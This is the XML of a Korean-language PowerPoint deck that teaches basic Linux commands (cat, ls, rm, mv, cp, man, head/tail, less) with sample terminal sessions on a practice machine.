                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="타원 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5D134A-0B4D-494F-8C49-F9BD261C73B9}"/>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41" name="타원 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4B6C07-6AD5-4A5D-B61C-4DB051517BAD}"/>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6" name="TextBox 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9A1D73-CFB7-4D50-BEED-3D8EF9C63818}"/>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7" name="직선 화살표 연결선 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD73CF56-CE85-4AC5-9721-048971D2CD4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41"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FCF514F-E568-48EA-AABA-A6248AFD0D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-11756" y="2780465"/>
            <a:ext cx="2195299" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.kitribob.kr/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="직사각형 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06214921-FDF1-42E2-9571-A3D7834FB195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3487849" y="2816671"/>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0" name="Picture 6" descr="차세대 보안리더 양성 프로그램(BoB) 9기 모집 중… 6월 5일 마감 - 세계일보">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E34F036E-E6DB-41F6-A22D-1E81DB7175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1275" y="1388703"/>
            <a:ext cx="3683116" cy="5201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498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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일생성 및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3"/>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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt; file1</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-al </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt; file2</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 file2</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22 15:25 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-x 3 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>22 15:00 ..</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n file1</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>     1  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>     2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     3  -</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     4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a:t>     5  </a:t>
              </a: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a:t>     6  </a:t>
              </a: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&gt; file3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test file...                                       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: ctrl d </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>로 저장한다</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cat file3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>test file...</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13EA3627-6574-4E1A-A2B9-638396A1A39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384340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rm : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일이나 디렉토리를 삭제</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file2  file3  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rm file*</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`file2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>'?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파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`file3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>'?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 test3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>디렉토리 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`test3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>/’? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Y</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rf test4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: force, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>강제로 삭제한다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04507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p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`newfile'?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빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`oldfile'?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8171CE12-5414-4308-AE17-F897C3D9AA3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339277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mv</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File1</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file1  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84674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cd dir1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3E95ABA1-5A5D-4C6C-9D74-E9B9C389F41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422156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/T2/9</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디렉토리를 복사</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solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a: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 dir1/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>file1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AD4E8980-CE65-4FD1-8D26-5130C9071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069149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man : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 매뉴얼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man cp</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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>q</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cp </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>--help</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>Usage: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>cp [OPTION]... [-T] SOURCE DEST</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  or:  cp [OPTION]... SOURCE... DIRECTORY</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  or:  cp [OPTION]... -t DIRECTORY SOURCE...</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>Copy SOURCE to DEST, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>or multiple </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>SOURCE(s) to DIRECTORY.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>긴 옵션에서 꼭 필요한 인수는 짧은 옵션에도 꼭 필요합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  -a, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>--archive                same </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>as -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>dR</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>--preserve=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>all</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>      --backup[=CONTROL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>]       make </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>a backup </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>of each existing destination file</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>b                           like </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>--backup </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>but does not accept an argument</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8DA82AC-5EBF-46EE-B886-DFBC980828E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="924959" y="2099144"/>
            <a:ext cx="4960705" cy="2531131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="화살표: 오른쪽 13">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{251D2A05-6BF4-40B2-B0E7-118B53AA823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810439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/T2/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>/tail</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보고싶은 줄 수만큼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>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cat /etc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daemon</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:x:2:2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:daemon</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:/</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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost log</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# less /etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rpcuser</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:x:29:29:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>RPC Service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nfsnobody:x:65534:65534:Anonymous </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>NFS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mailnull:x:47:47::/var/spool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smmsp:x:51:51::/var/spool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distcache:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>x:94:94</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:Distcache:/:/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highlight>
                    <a:srgbClr val="A6A6A6"/>
                  </a:highlight>
                </a:rPr>
                <a:t>/etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="A6A6A6"/>
                  </a:highlight>
                </a:rPr>
                <a:t>/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:highlight>
                  <a:srgbClr val="A6A6A6"/>
                </a:highlight>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>위에서 아래</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>아래에서 위로 둘 다 이동이 가능</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>화살표키</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>, Page </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>Up</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>, Page </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>Down </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>키가 작동함</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>파일을 다 읽고 나가기 위해서는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>q</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>키를 눌러야 함</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a: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243400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost log</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>head </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
